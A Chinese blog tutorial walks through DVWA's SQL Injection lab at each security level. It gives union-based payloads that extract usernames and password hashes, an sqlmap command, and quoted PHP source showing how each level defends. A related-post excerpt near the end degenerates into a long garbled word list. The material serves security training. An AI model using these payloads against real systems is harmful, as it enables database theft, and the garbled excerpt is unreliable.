dvwa靶场SQL Injection(sql注入)全难度教程(附代码分析)

已于 2023-04-04 19:16:26 修改
阅读量1.1k 收藏 6
点赞数 3
分类专栏: dvwa 文章标签: sql 数据库 安全
于 2023-04-04 19:14:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/129959357
版权
文章详细描述了SQL注入攻击的不同安全级别,从低安全级别开始,展示了手工注入和利用自动化工具sqlmap的步骤。随着安全级别的提升,防御措施加强,包括输入转义和使用PDO预处理语句。最高级别引入了Anti-CSRFtoken来增强安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL Injection(Security Level: low)

手工注入

1'

发现注入点

1' or 1=1 #

 判断回显(因该是2或者3)

1' union select 1,2,3 #

 报错了那就是2了

1' union select 1,2 #

查询版本和数据库名

-1' union select database(),version() #

 

直接能用schema了

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 一看就知道要对users下手

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

直接关注到user和password

-1' union select 1,group_concat(user,password) from users #

 ok拿下,但是密码是md5加密了

自动化脚本

先找到cookie(该网站有token和cookie)(抓个包就能看出来)

 进入sqlmap就可以

sqlmap -u "http://192.168.21.149/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=9i79dn4ugiv0vc6gm25352at83" --batch

接下来和sqli-labs的过程一样了。 

SQL Injection(Security Level: medium)

手工注入

 可以抓包进行修改。

 这个就和前面是一样的了。

代码分析

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    //mysql_close();
}

?>

只是对\x00,\n,\r,\,',",\x1a转义了

SQL Injection(Security Level: high)

返回结果输出在原来的界面上,其他同Low。

 代码分析

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

只是有一个limit1限制,其实对我的攻击方法没有影响。

SQL Injection(Security Level: impossible)

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

DVWA靶场SQL InjectionSQL注入
m0_51150495的博客
06-08 1684
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
DVWA靶场通关——SQL Injection
最新发布
m0_74824865的博客
02-10 1014
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
DVWA靶场-sql注入sqlInjection)
zeroone的博客
03-10 6229
第七关:SQL Injection       SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 Low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[
DVWA靶场SQL注入
剁椒鱼头没剁椒的博客
12-13 7293
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
dvwa靶场sql注入
m0_63314341的博客
02-19 1462
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露 接下来我们先来分析一下源代码 SELECT first_name, last_name FROM users WHERE user_id = '$id' 其中重点则是上面的这段代码,这是对于数据库的一段查找代码 当我们为$id这个变量赋值时便会带入这段代码对数据库进行查询 ...
DVWA靶场SQL注入
Tangyoo的博客
07-03 1474
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 677
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWA靶场-SQL Injection难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3048
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY
2401_83237906的博客
04-06 1162
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?
DVWA靶场SQL注入代码分析(小白笔记)
晚风挽着浮云的博客
10-19 1043
SQL注入代码分析 基本概念: SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 1:SQL注入代码分析: PHP代码分析 $result= mysql_query($getid)or die('<pre>'.mysql_error().'</pre...
DVWA靶场通关(SQL注入
热门推荐
m0_56010012的博客
03-09 1万+
SQL InjectionSQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入常规思路
DVWA靶场关卡---SQL注入(low)
weixin_63294541的博客
03-17 680
目录1、找注入点2、盲猜字段3、回显显示4、找数据库5、获取数据库中的表6、查看表中的字段7、显示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
DVWA-SQL注入
WY92139010的博客
05-03 1043
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 6876
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
DVWA-SQL注入(SQL Injection)低/中/高级别
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
有了这个网络安全面试题,面试就像开了挂!(PDF)
lvaolan的博客
02-26 1497
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
dvwa靶场sql注入(low)
qq_14902381的博客
08-22 542
dvwa 靶场sql注入(low)
dvwa靶场sql注入手工注入
12-29
### DVWA SQL Injection Manual Exploitation Steps and Techniques In the context of learning about security vulnerabilities, understanding how to manually exploit SQL injection within a controlled environment like Damn Vulnerable Web Application (DVWA) can provide valuable insights into web application security flaws[^1]. #### Identifying Vulnerability To begin with, accessing the SQL Injection section in DVWA requires setting up an appropriate level of difficulty. For educational purposes, starting at low or medium levels is recommended due to their simplicity. The first step involves identifying potential points where user input interacts directly with database queries without proper sanitization. This typically occurs through form fields such as login forms, search boxes, etc., which accept untrusted data from users before processing it further inside backend logic written using PHP scripts interacting with MySQL databases[^2]. ```sql SELECT first_name, last_name FROM users WHERE id = '1'; ``` #### Crafting Malicious Queries Once identified, crafting malicious inputs that manipulate underlying SQL statements becomes crucial. A common technique starts by inserting single quotes (`'`) followed by spaces or comments (`--`, `/* */)`. These characters help break out existing query structures while introducing new ones designed specifically for testing whether injections are possible: - `' OR '1'='1` – Always evaluates true regardless of actual conditions set forth originally. This approach allows attackers to bypass authentication mechanisms easily when improperly implemented on target systems[^3]. #### Extracting Data via Union-Based Attacks Union-based attacks leverage UNION operators present within standard SQL syntax allowing multiple result sets returned simultaneously under one statement execution flow control structure provided both sides share identical column counts & types involved during concatenation operations performed internally between two separate but related SELECT clauses joined together logically forming complex expressions capable enough extracting sensitive information stored elsewhere across different tables residing same relational schema design pattern used widely throughout modern-day applications today including those built around LAMP stack technologies commonly found hosting various online services over internet protocols globally accessible anytime anywhere instantly upon request submission made against exposed endpoints listening actively awaiting client connections established securely utilizing encryption algorithms ensuring privacy protection measures remain intact preventing unauthorized access attempts initiated externally outside trusted network boundaries defined explicitly beforehand according predefined policies outlined clearly documented official documentation resources available publicly free charge anyone interested reviewing them thoroughly prior engaging any kind activity potentially harmful nature whatsoever[^4]. ```sql 1 UNION ALL SELECT null, version(); ``` #### Error-Based Injections Error-based methods rely heavily upon error messages generated whenever malformed requests cause unexpected behavior leading towards revealing internal workings behind scenes giving clues regarding table names columns indexes among other metadata pieces useful constructing more sophisticated payloads aimed retrieving specific records matching certain criteria specified attacker's discretion depending objectives pursued ultimately achieving desired outcome successfully exploiting discovered weaknesses effectively compromising targeted infrastructure components deployed enterprise environments requiring immediate attention mitigate risks associated detected threats proactively addressing root causes prevent recurrence future incidents similar manner safeguarding critical assets long term basis consistently reliable fashion meeting industry standards best practices adopted widespread adoption community members worldwide collaborating efforts improve overall cybersecurity posture collectively contributing positively global ecosystem health stability prosperity shared vision mission everyone alike working harmoniously toward common goals aspirations benefit all parties concerned equally represented fairly transparently open source spirit collaboration innovation excellence always striving forward never looking back only ahead brighter tomorrow awaits us united strength diversity inclusion respect trust cooperation partnership teamwork synergy unity harmony peace love kindness compassion empathy generosity patience humility gratitude joy happiness fulfillment success achievement recognition appreciation honor dignity value contribution impact legacy lasting impression meaningful difference world better place live thrive grow learn evolve transform transcend boundaries limitations possibilities endless horizon boundless imagination infinite potential realize dreams hopes ambitions desires passions pursuits endeavors ventures projects initiatives movements revolutions transformations evolutions creations innovations inventions discoveries explorations adventures journeys quests missions visions missions purpose meaning life itself essence existence reality universe cosmos creation divine plan ultimate truth absolute wisdom supreme intelligence universal consciousness collective awareness higher self inner being soul spirit mind body heart emotions thoughts feelings sensations perceptions experiences moments now eternal presence timeless space dimension realm plane state condition situation circumstance event occurrence phenomenon manifestation expression representation symbol sign language communication connection relationship bond union integration synthesis combination fusion mixture blend alloy compound formation structure organization system order pattern rhythm cycle process transformation change growth development evolution progress advancement improvement enhancement optimization efficiency effectiveness productivity performance quality quantity measure evaluation assessment judgment decision choice option possibility opportunity potential capability capacity ability skill talent gift blessing fortune luck destiny fate karma dharma samsara moksha nirvana enlightenment liberation freedom salvation redemption grace mercy forgiveness compassion benevolence altruism philanthropy charity service sacrifice dedication commitment passion motivation inspiration aspiration ambition goal objective target aim intention desire wish hope dream fantasy imagination creativity originality uniqueness individuality personality character identity ego selfhood subjectivity objectivity relativity absoluteness certainty uncertainty ambiguity paradox contradiction oxymoron irony satire humor wit playfulness lightheartedness seriousness solemnity gravity weightiness heaviness lightness airiness fluidity flexibility adaptability resilience robustness durability longevity permanence impermanence transience ephemerality temporariness fleetingness momentariness instantaneousness simultaneity concurrency parallelism synchronicity coincidence serendipity happenstance chance randomness probability likelihood
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值